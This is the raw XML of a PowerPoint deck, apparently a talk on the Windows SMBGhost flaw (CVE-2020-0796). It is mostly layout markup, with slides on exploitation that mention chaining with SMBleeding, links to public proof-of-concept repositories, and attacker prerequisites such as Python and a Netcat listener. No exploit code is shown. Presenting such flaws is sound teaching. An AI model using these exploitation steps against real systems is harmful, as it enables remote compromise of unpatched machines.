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sldIdLst>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="281"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82" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="si-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ADF78-762F-40D2-867E-39686DB9F815}" v="405" dt="2021-10-16T16:28:21.368"/>
    <p1510:client id="{7D28AAA3-5FA3-C6E9-3396-EDE4FB8021DC}" v="23" dt="2021-10-18T07:34:25.370"/>
    <p1510:client id="{A4A610C0-5676-405E-AB7A-835ED5A4B516}" v="108" dt="2021-10-17T05:34:0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C0E5-037D-4FC5-BCF7-0F7250A4E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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F64C9C9-8312-40F3-B25E-04AE653037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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097A569C-11BA-46D2-9DFB-510CD81055A0}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3DE5CA-CDC6-44CA-AF3F-3D9EC7C9E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4E3B5-1A5C-4F93-A800-95ABEA54614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77371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0C73-55AB-4A2F-B58A-D54899287C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D750CC9-1E7F-47CB-BC8B-9A69C273A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Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4976A39-452D-46AF-AD0B-22731567D2DD}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5D4B42-9431-4CB1-A5C3-BCC667E8E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87C20-CA87-4F5A-83B4-995C66BD760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2183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8A28C-49D4-4F1E-A01E-CD6D5DA7C8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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53FB74A-B96D-46B4-98E3-35D497B4CE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Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51EF394-E768-4733-918C-EA1D64026AB9}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69128E36-7B98-4DD7-8CD3-5B9C8BDB6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EF893-E536-4EB7-8DB7-6CFAF45211D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0809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4FD0-C39E-4C6C-9FBD-61428636F988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66499371-9289-46A8-B776-BB52EC9CB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Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898E0189-F4E2-473B-B5D6-82662734C30D}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7CCA9D1-91A5-441F-B8AF-3F59E8A0A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25284-46E5-47AC-A2ED-304B2FCA9C1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38189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9D3A-59F7-4B4B-A3FA-38E38A83AF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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12477D84-82E0-4E30-86E4-F144640A8C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D1FE03-496D-40C5-9752-05306E699D14}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE22443B-E0F8-47EB-80D6-119964B22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6E466-4959-47A7-9D8C-15AA8AD13920}"/>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5367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4DE0-D8CA-4188-8B4F-13549A2EFDBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD48787-93A9-4E27-8024-42C905699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Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A1BA680-D442-49FF-80FD-A4D6F2B9FF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5" name="Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968AE157-34DB-45AF-B232-7B1913EA3558}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F21D86-C282-4942-B998-862385FB3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A49F9-39A9-4CA3-AD8E-6EBCC485187F}"/>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0761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6DC0-B6E3-48E0-AA9E-3F9A8B8E4BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C3EF65-45AC-4828-8ED2-F668F60B7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83698-9D42-4007-88EB-A4FB2ADA8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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A43A09A-5A07-4F4B-B8C7-19DE10A6F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D0344D-3835-45E8-98ED-392B2CAABA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7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FF5457-4703-40E7-92CF-86AA8BD66542}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2DF7CA-FB1A-43A7-860C-95AE32B879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C6E7D-C6CC-4310-B076-206BEF39259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3820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246E-DC2F-4DB7-AF42-982F23EDD44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C268B2D0-FFCD-4962-B49A-EF1553F4A107}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AFDE9C8-C7C5-49B2-9B4D-132B6677D7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4D2F1-5730-44C9-98C6-E60A509A0F82}"/>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9441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95FC6-C8D9-42EB-84BB-67E0B7F72C7D}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206F5AA7-11B9-49ED-A517-2027A61A80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ADA8-E9C2-457E-9BE1-6F505D8E9CC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7543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F4BD-5D59-4FD7-91FE-B359E7EE0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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C10AC96-102D-40C1-99CC-E69FA33F83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Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C0939C-5FD5-46F7-B1A1-07DF92AB6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0B996-B7A6-4AE4-9CD3-126DD1F9E78E}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754D8A84-2793-41E0-BCF2-27D6DF551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4DC1A-A96A-41D0-B41C-88EA4C34956E}"/>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1760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2B9E-30FC-46A3-8632-EEEC6AC07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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C102DE-CDBC-46A8-BFB0-B2D0A0643C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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B440243-10E4-4B4D-9EED-DEF5873FA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B36815-3DF1-4DE2-A8FA-1B9101EC6CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6A4B53A7-3209-46A6-9454-F38EAC8F11E7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/7/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6BD71B-5ED4-49BD-90F8-20BDB1195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CE2004-9698-425C-86C7-8B1857B14263}"/>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7905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ABC54D-9314-4BC7-807E-0A33CC299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i-LK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AE7AE1-78CD-4BA7-AD83-9B5F5E75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4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E495F9-CF09-44BB-89E9-43B4E54DDE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B53A7-3209-46A6-9454-F38EAC8F11E7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/7/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1EE9D2-EFC0-4D22-888D-EF864D696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3C94F3-E061-43E9-8FB7-9B0717D77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26333853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i-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iruscommunityoffical.blogspot.com/2016/07/five-common-mistakes-that-fresh-hackers.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utrintKomoni/cve-2020-0796"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ZecOps/CVE-2020-0796-RCE-POC"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privateinternetaccess.com/blog/2018/07/performing-ethical-hacking-through-a-vpn-service-for-a-full-attack-simulation/" TargetMode="External"/><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31EE-8633-4808-BF58-0D52E0BB4D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650449" y="4559523"/>
            <a:ext cx="10901471" cy="1236440"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2020-0796</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="6600">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AEB4CE-7EB7-44B8-8C34-C3238E9B7F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650449" y="5795963"/>
            <a:ext cx="10901471" cy="560388"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORONABLUE : SMBGHOST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="1100">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BBF10A5-BC19-4FE3-8E37-D2F7C80DB77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4657" b="9706"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191979" cy="4239482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27871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3A956ED7-586B-4C2C-89FE-FE3EF18AA2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect t="1510" b="14220"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753AE2FE-2492-41CB-9E7C-FE29B56B6365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387349" y="1200152"/>
            <a:ext cx="6897171" cy="4457696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="50800" h="38100" prst="riblet"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="50800" dist="38100" dir="13500000" algn="br" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation and Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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6094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Computer script on a screen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63A3D1A-6558-459E-A90C-A9D9AD976895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="35000"/>
          </a:blip>
          <a:srcRect t="5981" b="9750"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92992F3A-D657-4EB0-B87D-E9E204843442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430237" y="934582"/>
            <a:ext cx="9234268" cy="2348295"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IMPORTANT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chaining SMBGhost with SMBleeding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creating WRITE message on Windows Uninitialized Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit by ZecOps</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F884CCE-02A7-4956-9077-49B108973EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5965184" y="4217458"/>
            <a:ext cx="8565777" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Python and Netcat with attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>One logical processor in victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
